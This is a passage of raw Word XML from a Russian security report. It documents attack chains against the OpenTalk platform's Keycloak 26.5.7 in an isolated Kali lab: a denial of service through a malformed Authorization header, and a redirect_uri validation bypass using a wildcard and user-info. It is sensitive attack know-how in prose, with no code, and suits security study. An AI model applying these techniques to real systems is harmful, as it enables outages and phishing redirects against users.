      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблице</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00411926">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453C764" w14:textId="5B58CBB7" w:rsidR="00C27C90" w:rsidRPr="00C27C90" w:rsidRDefault="00C27C90" w:rsidP="00C27C90">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Ref234285018"/>
      <w:r>
        <w:t>Последовательность действий 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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2"/>
        <w:gridCol w:w="2031"/>
        <w:gridCol w:w="1913"/>
        <w:gridCol w:w="1829"/>
        <w:gridCol w:w="2999"/>
      </w:tblGrid>
      <w:tr w:rsidR="00002CDB" w14:paraId="126B4262" w14:textId="77777777" w:rsidTr="00557FDB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="550C6188" w14:textId="77777777" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00D63039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</w:rPr>
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570691F2" w14:textId="77777777" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00D63039">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Этап эксплуатации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3219CE33" w14:textId="77777777" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00D63039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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Действие</w:t>
            </w:r>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">/CVE </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D41DA88" w14:textId="2DB4D555" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00D63039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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Условия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3025" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="230859D7" w14:textId="595E2F1A" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00D63039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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00002CDB" w14:paraId="31F070B4" w14:textId="77777777" w:rsidTr="00002CDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DE62B3" w14:textId="77777777" w:rsidR="00002CDB" w:rsidRPr="00984FD9" w:rsidRDefault="00002CDB" w:rsidP="00D63039">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697D303C" w14:textId="6163CB93" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00002CDB" w:rsidP="00D63039">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00002CDB">
              <w:t>Отказ в обслуживании</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B06B61" w14:textId="1306AB2A" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00411926" w:rsidP="00D63039">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-9803</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7B0D2B" w14:textId="3C9F754B" w:rsidR="00002CDB" w:rsidRPr="00E567F1" w:rsidRDefault="00002CDB" w:rsidP="00D63039">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3025" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45142C33" w14:textId="7C41A108" w:rsidR="00002CDB" w:rsidRDefault="00414482" w:rsidP="00D63039">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Не аутентифицированный</w:t>
            </w:r>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> нарушитель шлёт некорректный заголовок </w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Authorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> на </w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>конечную точку</w:t>
            </w:r>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> регистрации клиента</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19C42FF4" w14:textId="77777777" w:rsidR="00497FAD" w:rsidRDefault="00497FAD" w:rsidP="006974E9">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BAD953" w14:textId="5A5E7D15" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="006974E9">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>В результате происходит</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CDB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:snapToGrid/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CDB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>тказ сервера аутентификации,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CDB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вся платформа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00002CDB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> теряет возможность входа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B6180" w14:textId="77777777" w:rsidR="00A1333F" w:rsidRDefault="00A1333F" w:rsidP="006974E9">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9AB27C" w14:textId="0224AA6B" w:rsidR="006804DB" w:rsidRPr="00C27C90" w:rsidRDefault="00A1333F" w:rsidP="006804DB">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Воспроизведение цепочки 1 в ПО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D1202" w14:textId="1F0AA6D5" w:rsidR="006804DB" w:rsidRDefault="006804DB" w:rsidP="006804DB">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Проверка цепочки</w:t>
      </w:r>
      <w:r w:rsidR="00DE4784">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">проводится в изолированной сети </w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5" w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>», цепочка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> завязана на микросервисе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>26.5.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> как единственного внешне достижимого компонента платформы, обрабатывающего </w:t>
      </w:r>
      <w:r w:rsidR="00411926">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OIDC-токены</w:t>
      </w:r>
      <w:r w:rsidR="00411926">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для достижения необходимых целей будут использоваться </w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5">
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="008C7BD5" w:rsidRPr="008C7BD5">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
          </w:rPr>
          <w:t>CVE-2026-7504</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C7BD5">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5" w:rsidRPr="008C7BD5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5">
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="008C7BD5" w:rsidRPr="008C7BD5">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
          </w:rPr>
          <w:t>CVE-2026-9704</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C7BD5">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="008C7BD5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ниже приведена </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(таблица</w:t>
      </w:r>
      <w:r w:rsidR="00411926">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00411926">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>реализаци</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006804DB">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> цепочки на демонстрационном стенде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35585D73" w14:textId="3DD98B24" w:rsidR="008C7BD5" w:rsidRDefault="00411926" w:rsidP="00411926">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:r>
        <w:t>Этапы воспроизведения уязвимости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572"/>
        <w:gridCol w:w="2974"/>
        <w:gridCol w:w="5805"/>
      </w:tblGrid>
      <w:tr w:rsidR="006804DB" w:rsidRPr="00087F8B" w14:paraId="599AEE39" w14:textId="77777777" w:rsidTr="00557FDB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E72F8B" w14:textId="10CA65A0" w:rsidR="006804DB" w:rsidRPr="00C82B97" w:rsidRDefault="006804DB" w:rsidP="006804DB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</w:rPr>
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4417BFD6" w14:textId="4051CF85" w:rsidR="006804DB" w:rsidRPr="00C82B97" w:rsidRDefault="006804DB" w:rsidP="006804DB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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Этап</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25E19196" w14:textId="1469BF26" w:rsidR="006804DB" w:rsidRPr="00C82B97" w:rsidRDefault="008C7BD5" w:rsidP="006804DB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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Комментарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="0BC83371" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362D5A6C" w14:textId="01F52539" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="008C7BD5" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04F2C38B" w14:textId="173469F1" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="008C7BD5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 xml:space="preserve">Проверка сервера на наличие </w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-7504</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70446AF5" w14:textId="2525DF54" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="008C7BD5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 xml:space="preserve">Для эксплуатации уязвимости нужно проверить конфигурацию </w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">При символе </w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00763E44" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>пытается</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> провалидировать, что </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>redirect_uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> не содержит вредоносный </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>user-info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, чтобы не допустить фишинговых редиректов. Из-за расхождений между </w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>java</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> и </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00763E44" w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00763E44" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>валидатор</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> не видит подозрительный </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>user-info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:rPr>
